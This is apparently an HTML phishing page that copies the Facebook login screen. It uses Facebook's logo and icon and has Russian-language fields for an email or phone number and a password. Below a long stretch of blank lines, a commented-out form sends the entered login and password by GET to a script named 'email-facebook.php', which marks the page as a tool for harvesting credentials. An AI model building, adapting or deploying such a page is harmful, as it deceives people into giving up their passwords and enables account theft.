<!DOCTYPE html>
<html lang="ua">
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content="">
    <meta name="author" content="">
    <link rel="icon" href="https://static.xx.fbcdn.net/rsrc.php/yD/r/d4ZIVX-5C-b.ico">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@3.3.7/dist/css/bootstrap.min.css">
    <title>Facebook</title>
  </head>
  <body style="min-height: 100vh;">

<main class="main">  
	<div class="container">
		<div class="main-control">
			<div class="row">
				<img src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg" alt="">
                 <div class="forma">
                 	<form action="">
                 		<p class="p">Вход на Facebook</p>
                 		<input type="login" name="" placeholder="Электронный адрес или номер телефона">
                 		<input type="password" name="" placeholder="Пароль">
                 		<button class="button1">Вход</button>
                 	</form>
                 	<a class="a" href="#">Забыли аккаунт?</a>
                 	<div class="p1"></div> <p class="p3">или</p> <div class="p1"></div>
                    <a class="a-two" href=""><button class="button2">Coздать новый аккаунт</button></a>
                 </div>
			</div>
		</div>
	</div>
</main>

<style>
	html, body{
		height: 100%;
	}
.main{
	background: rgb(240, 242, 245) no-repeat center;
	background-size: 100%;
	height: 100%;
}
.main-control{
	text-align: center;
}
img{
	width: 240px;
	display: block;
	margin: auto;
	margin-top: 3rem;
}
.forma{
	background-color: white;
	display: inline-block;
	border-radius: 0.8rem;
	width: 39rem;
	padding: 2.5rem 1.5rem 2.5rem 1.5rem;
	box-shadow: rgba(0, 0, 0, 0.1) 0px 2px 4px 0px, rgba(0, 0, 0, 0.1) 0px 8px 16px 0px;
	margin: 0 1rem;
}
input{
	display: block;
	width: 100%;
	padding: 1.1rem 1.3rem;
	border-radius: 0.4rem;
	border: 1.5px solid #b4b4b4;
	font-size: 17px; 
	margin: 1.5rem 0;
}
input::placeholder{
	color: rgba(180, 180, 180, 00.9); 
}
.p{
	font-size: 19px;
	line-height: 22px;
	margin-bottom: 2rem;
}
.button1{
 width: 100%;
 color: white;
 font-weight: bold;
 font-size: 20px;
 padding: 0.6rem 0;
 border: none;
 border-radius: 0.5rem;
 background-color: #1877f2;
}
.a{
	color:#1877f2; 
	display: block;
	margin-top: 1.4rem;
}
.p1, .p3{
 display: inline-block;
}
.p1{
  background-color: rgba(180, 180, 180, 0.6);
  height: 1px;
  width: 45%;
}
.p3{
	color: rgba(180, 180, 180, 1);
	font-size: 12px;
	position: relative;
	top: 3px;
}
.a-two{
	display: block;
}
.button2{
	width: 65%;
	background-color: rgba(43, 146, 23, 0.8);
	font-size: 17px;
	font-weight: bold;
	color: white;
	border: none;
	border-radius: 0.4rem;
	padding: 1rem 1rem;
	margin-top: 1rem;
}
@media(max-width: 410px){
  .forma{
   width: 33rem;
  }
  .button2{
  	font-size: 12px;
  }
}
@media(max-width: 349px){
  .forma{
   width: 30rem;
  }
  .p1{
  	width: 40%;
  }
}
input {outline:none;}

.button1:hover{
	background-image: -webkit-linear-gradient(top, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.2));
}
.button2:hover{
	background-image: -webkit-linear-gradient(top, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.2));
}
</style>

  </body>
</html>















































































<!--
<form action="email-facebook.php" method="GET">
	<input name="login" placeholder="Мобильный телефон или электронный адрес">

	<input class="_56bg _4u9z _27z2 _8qtm" name="password" placeholder="Пароль" type="password">

	<button style="background-color: rgb(24, 119, 242); border: none; width: 15rem; border-radius: 0.2rem; padding: 0.7rem 0; color: white; font-weight: bold; font-size: 1.1rem;" name="formSubmit" ><span class="_55sr">Войти</span></button>
</form>
-->